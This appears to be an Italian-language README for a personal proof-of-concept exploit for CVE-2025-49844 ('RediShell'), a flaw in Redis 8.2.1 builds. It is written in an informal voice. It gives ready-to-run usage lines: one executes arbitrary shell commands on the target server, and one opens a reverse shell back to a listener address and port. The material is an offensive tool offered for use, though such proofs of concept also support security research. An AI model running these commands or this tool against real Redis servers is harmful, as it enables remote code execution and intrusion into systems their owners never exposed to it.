
Prova di concetto per CVE-2025-49844
Il mio proof-of-concept personale per CVE-2025-49844, noto anche come RediShell.
Build di destinazione supportate:
redis:8.2.1-alpineredis:8.2.1-bookwormÈ un po' rozzo, probabilmente non all'altezza di quello di Wiz Research. Tuttavia, sono contento di essere riuscito a farlo funzionare prima che i talk di Hexacon 2025 fossero caricati, e mi sono divertito molto a indagarlo.
Esegui comandi shell unidirezionali:
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
Connettiti a una reverse shell:
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444